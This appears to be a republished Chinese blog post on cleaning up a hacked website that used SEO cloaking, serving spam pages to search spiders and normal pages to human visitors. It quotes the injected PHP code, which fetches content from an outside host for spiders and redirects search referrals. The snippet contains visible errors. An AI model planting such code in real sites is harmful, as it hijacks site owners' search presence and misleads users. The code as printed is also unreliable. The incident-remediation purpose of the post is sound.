2021-12-19 分類: 網站建設
前天 QQ上收到一個朋友發來的消息,問我在嗎,我一看是創業園時候的朋友,就聊了起來,他所在的公司的客戶的網站被入侵了
但是他和我說 他的那個客戶的網站不是這類的,和這個一點關系都沒有,我打開了域名看到的實際內容是
是一個商業網站,這時候我的思路很清晰了,首先可以確定的是人和蜘蛛看到的內容不一樣,這也是常用黑帽手法,這樣可以獲取大量的外鏈,為了進一步確認的我思路,我決定用蜘蛛模擬器試試結果如下圖:
果然和我想的是一樣的,這就證明了我的猜想,這種一般就是在網站根目錄添加一個畸形文件,讓這個畸形文件無法刪除
并且優先級要高于網站本身的權限,或者是在網站的默認文件檔里面加上一段代碼,來調用他的文件,來判斷來的人還是蜘蛛
如果是蜘蛛就給它顯示博采的內容,如果是人就顯示正常的頁面,在了FTP帳號密碼 進行一步檢查,
發現用的是我的第二種手法, 在文件內加入了以下PHP代碼
$file="http://www.aoxsys.net/seo/3.html";
$referer=$_SERVER["HTTP_REFERER"];
$agent= strtolower($_SERVER["HTTP_USER_aGENT"]);
if(strstr($referer,"baidu")&&strstr($referer,"456"))
{
Header("Location: $url");
}
if ( ereg( "http://www.aoxsys.net/search/spider.htm",$agent ))
{
$content=file_get_contents($file);
echo $content;
exit;
}
>
< php
這個代碼明白的一看就知道了吧,我就不解釋了,在根目錄還發現一個加密的文件,那個文件貌似是博采的網頁內容,命名為index.asp.asp 接下來就是替換INDEX.PHP文件 然后刪除相關后門,打上補丁,
但是當我拿到網站后臺的帳號密碼的時候我崩潰了,密碼竟然 是默認的,帳號也是默認的,程序是DEDE 存在安全漏洞
修補漏洞 用DEDE的安全檢測工具稍微檢查了一下木馬和WEBSHELL 沒有多余發現,打上補丁收工,再用蜘蛛模擬器查看
網站內容和蜘蛛的爬行內容一致了 接下來就是@蜘蛛了 讓蜘蛛過來爬 收錄并更新快照 什么怎么@蜘蛛嗎 這你都不會嗎
那我也不會 嘿嘿!
網站標題:解決網站快照與網站實際內容不符
文章起源:http://m.newbst.com/news2/141052.html
成都網站建設公司_創新互聯,為您提供電子商務、標簽優化、網站內鏈、移動網站建設、定制開發、全網營銷推廣
聲明:本網站發布的內容(圖片、視頻和文字)以用戶投稿、用戶轉載內容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網站立場,如需處理請聯系客服。電話:028-86922220;郵箱:631063699@qq.com。內容未經允許不得轉載,或轉載時需注明來源: 創新互聯
猜你還喜歡下面的內容